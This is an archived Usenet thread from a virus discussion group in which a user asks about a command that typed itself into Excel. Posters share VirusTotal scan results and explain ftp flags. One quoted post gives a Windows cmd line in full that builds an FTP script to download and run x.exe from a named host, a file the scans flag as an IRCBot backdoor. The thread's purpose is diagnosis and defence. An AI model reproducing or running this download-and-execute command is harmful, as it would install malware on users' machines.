Windows virus on my mac?
in [Viruses]
|
From: Ron Lopshire on 9 Mar 2007 09:24 Axel Hammerschmidt wrote: > Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote: > > <snip> > >>You didn't attempt to delete x.exe? > > No, but I do regret not getting a copy, e-mailing it to my Hotmail > account and let their anti-virus scan it to see if it really was a > virus. Why would you want to do that, Axel? Submit suspicious samples to VT or Jotti. Virus Total Online Scan (http://www.virustotal.com/) Jotti's Online Malware Scan (http://virusscan.jotti.org/) Kaspersky File Scanner (http://www.kaspersky.com/scanforvirus) Norman SandBox (http://sandbox.norman.no/live.html) Dr.Web (http://support.drweb.com/sendnew/) Most AV vendors provide for the email submission of samples, but in most cases, only in password-protected archives (zip files). Sending a raw malware sample using email is almost never a good idea. Ron :)
From: Axel Hammerschmidt on 9 Mar 2007 09:56 Ron Lopshire <notron(a)ovbl.org> wrote: > Axel Hammerschmidt wrote: > > > Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote: > > > > <snip> > > > >>You didn't attempt to delete x.exe? > > > > No, but I do regret not getting a copy, e-mailing it to my Hotmail > > account and let their anti-virus scan it to see if it really was a > > virus. > > Why would you want to do that, Axel? <snip> I would never let anyone scan my computer.
From: Axel Hammerschmidt on 9 Mar 2007 09:56 Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote: > In article <1hupq5s.asg9om1qckmgN%hlexa(a)hotmail.com>, > hlexa(a)hotmail.com says... > > > Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote: > > > > <snip> > > > > > You didn't attempt to delete x.exe? > > > > No, but I do regret not getting a copy, e-mailing it to my Hotmail > > account and let their anti-virus scan it to see if it really was a > > virus. > > > That's what I meant, of course. Did I say delete? Dearie dear, > that would be irresponsible. I probably broke som law by just logging on to the site.
From: David W. Hodgins on 10 Mar 2007 17:27 On Sat, 10 Mar 2007 10:49:16 -0500, Ron Lopshire <notron(a)ovbl.org> wrote: > As I said, if you suspect a file, submit it to VT or Jotti. AntiVir was the only one detecting it via heuristics when I first checked. Panda had added it, when I checked yesterday, and Kaspersky today. Regards, Dave Hodgins Complete scanning result of "x.exe", received in VirusTotal at 03.10.2007, 22:52:23 (CET). Antivirus Version Update Result AntiVir 7.3.1.41 03.10.2007 HEUR/Crypted Authentium 4.93.8 03.09.2007 no virus found Avast 4.7.936.0 03.09.2007 no virus found AVG 7.5.0.447 03.10.2007 no virus found BitDefender 7.2 03.10.2007 no virus found CAT-QuickHeal 9.00 03.10.2007 no virus found ClamAV devel-20060426 03.10.2007 no virus found DrWeb 4.33 03.10.2007 no virus found eSafe 7.0.14.0 03.08.2007 no virus found eTrust-Vet 30.6.3469 03.10.2007 no virus found Ewido 4.0 03.10.2007 no virus found FileAdvisor 1 03.10.2007 no virus found Fortinet 2.85.0.0 03.10.2007 no virus found F-Prot 4.3.1.45 03.09.2007 no virus found F-Secure 6.70.13030.0 03.09.2007 no virus found Ikarus T3.1.1.3 03.10.2007 no virus found Kaspersky 4.0.2.24 03.10.2007 Backdoor.Win32.IRCBot.aac McAfee 4981 03.09.2007 no virus found Microsoft 1.2306 03.10.2007 no virus found NOD32v2 2106 03.10.2007 no virus found Norman 5.80.02 03.10.2007 no virus found Panda 9.0.0.4 03.10.2007 Trj/Downloader.NFL Prevx1 V2 03.10.2007 no virus found Sophos 4.15.0 03.10.2007 no virus found Sunbelt 2.2.907.0 03.10.2007 no virus found Symantec 10 03.10.2007 no virus found TheHacker 6.1.6.073 03.09.2007 no virus found UNA 1.83 03.09.2007 no virus found VBA32 3.11.2 03.10.2007 no virus found VirusBuster 4.3.19:9 03.10.2007 no virus found Aditional Information File size: 540672 bytes MD5: a6c18002d028be5616438f41a35df29c SHA1: 62cfa9ccf848c7a5187f82d4a19da79344deaea1 -- Change nomail.afraid.org to ody.ca to reply by email. (nomail.afraid.org has been set up specifically for use in usenet. Feel free to use it yourself.)
From: Axel Hammerschmidt on 11 Mar 2007 09:38 davanzati <davanzatiusa(a)gmail.com> wrote: > Hi all, > > I was working in an excel document, when I noticed that the selected > cell was moving itself. Then suddenly, one letter at a time, this > line typed itself in: > > cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston > powersoft >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> > ik &ftp -n -v -s:ik &del ik &x.exe &exit What is "ik" and -s:ik there for? And why these two? : -n : : Restrains ftp from attempting "auto-login" upon initial con- : nection. If auto-login is enabled, ftp will check the .netrc : (see below) file in the user's home directory for an entry : describing an account on the remote machine. If no entry : exists, ftp will prompt for the remote machine login name : (default is the user identity on the local machine), and, if : necessary, prompt for a password and an account with which to : login. : : -v : : Enable verbose and progress. This is the default if output is : to a terminal (and in the case of progress, ftp is the fore- : ground process). Forces ftp to show all responses from the : remote server, as well as report on data transfer statistics.
First
|
Prev
|
Next
|
Last
Pages: 1 2 3 Prev: Warning: Spyerase intentionally erases BugHunter from your machine Next: Is ole16.dll a virus? |